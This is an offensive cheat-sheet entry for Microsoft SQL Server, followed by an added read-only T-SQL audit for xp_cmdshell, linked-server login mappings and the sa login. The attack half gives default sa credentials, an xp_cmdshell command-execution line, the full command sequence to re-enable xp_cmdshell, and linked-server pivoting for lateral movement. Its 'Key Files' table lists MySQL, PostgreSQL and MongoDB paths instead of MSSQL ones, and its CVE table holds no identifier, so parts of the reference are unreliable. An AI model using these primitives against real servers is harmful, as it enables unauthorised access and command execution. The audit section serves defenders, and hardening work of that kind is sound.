MSSQL
Aliases: MSSQL, SQL Server, Microsoft SQL DB
Microsoft SQL Server is a relational database. Weak or default `sa` credentials, command execution through `xp_cmdshell`, and abuse of linked servers are the attack vectors most often seen against it.
Ports
| Port | Protocol | Description |
|---|---|---|
| 1433 | tcp | MSSQL |
| 1434 | udp | MSSQL browser |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| `nmap -sV -p <port> <target>` | Service banner and version info |
| `nc -nv <target> <port>` | Raw banner grab |
Key Files
| Path | Description |
|---|---|
| `/etc/mysql/mysql.cnf` | MySQL client configuration |
| `/var/lib/mysql/mysql/user.MYD` | MySQL user table data |
| `postgresql.conf` | PostgreSQL configuration file |
| `pg_hba.conf` | PostgreSQL client authentication rules |
| `mongod.conf` | MongoDB daemon configuration |
Default Credentials
| Username | Password | Context |
|---|---|---|
| `sa` | (empty) | SQL Server system admin |
| `sa` | `Password123` | Common test password |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| — | Auth | Weak SA password / default SA creds |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Impersonate SA | sqsh -S <target> -U sa | Connect as sysadmin |
| xp_cmdshell RCE | EXEC xp_cmdshell 'whoami' | RCE via xp_cmdshell |
| Linked Server | EXEC sp_linkedservers | Pivot through linked servers |
Notes
xp_cmdshell is disabled by default in modern SQL Server. It is an advanced configuration option, so `sp_configure` will not accept it until advanced options are exposed; enable it with:
`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;`
Linked servers in AD environments are a goldmine for lateral movement.
Tools: `sqsh`, `impacket-mssqlclient`, `netexec mssql`.
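The notes above cover the three weaknesses a responder or DBA should look for first: `xp_cmdshell` left enabled, linked servers with shared stored credentials, and an enabled `sa` login. The following T-SQL audit is an added example written for this page, not part of the original cheat-sheet or any tool it names. It reads only the catalog views `sys.configurations`, `sys.servers`, `sys.linked_logins` and `sys.sql_logins`, and assumes a sysadmin session on SQL Server 2012 or later; the remediation statements at the end are shown separately so they are not run by accident.

```sql
-- Added example (not from the original page): a read-only audit of the three
-- weaknesses the page lists, to be run by a sysadmin on SQL Server 2012+.

-- 1. Is xp_cmdshell live? value_in_use = 1 means shell execution is enabled
--    right now; 'show advanced options' = 1 shows someone exposed the switch.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Linked servers and how logins cross them.
--    local_principal_id = 0 is the default mapping that applies to ALL logins;
--    if that row has uses_self_cred = 0 and a remote_name, every local login
--    reaches the remote server with the same stored credential, which is the
--    pivot the page refers to. uses_self_cred = 1 means the caller's own
--    security context is forwarded instead.
SELECT s.name AS linked_server,
       s.data_source,
       s.provider,
       l.local_principal_id,
       l.uses_self_cred,
       l.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, l.local_principal_id;

-- 3. State of the built-in sa login (its SID is always 0x01, even if renamed).
--    Expected on a hardened instance: is_disabled = 1, or at least
--    is_policy_checked = 1 so the password policy applies.
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM sys.sql_logins
WHERE sid = 0x01;

-- Remediation, run deliberately and one statement at a time after review:
-- turn xp_cmdshell off again, hide advanced options, and disable sa so that
-- administration goes through named Windows logins instead.
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
-- ALTER LOGIN sa DISABLE;
```

Query 2 is the one worth reading carefully: a linked server whose default mapping (`local_principal_id = 0`) carries a stored `remote_name` is reachable by any login on the instance with the remote credential's privileges, so that row, rather than the mere existence of a linked server, is what turns a low-privilege foothold into lateral movement.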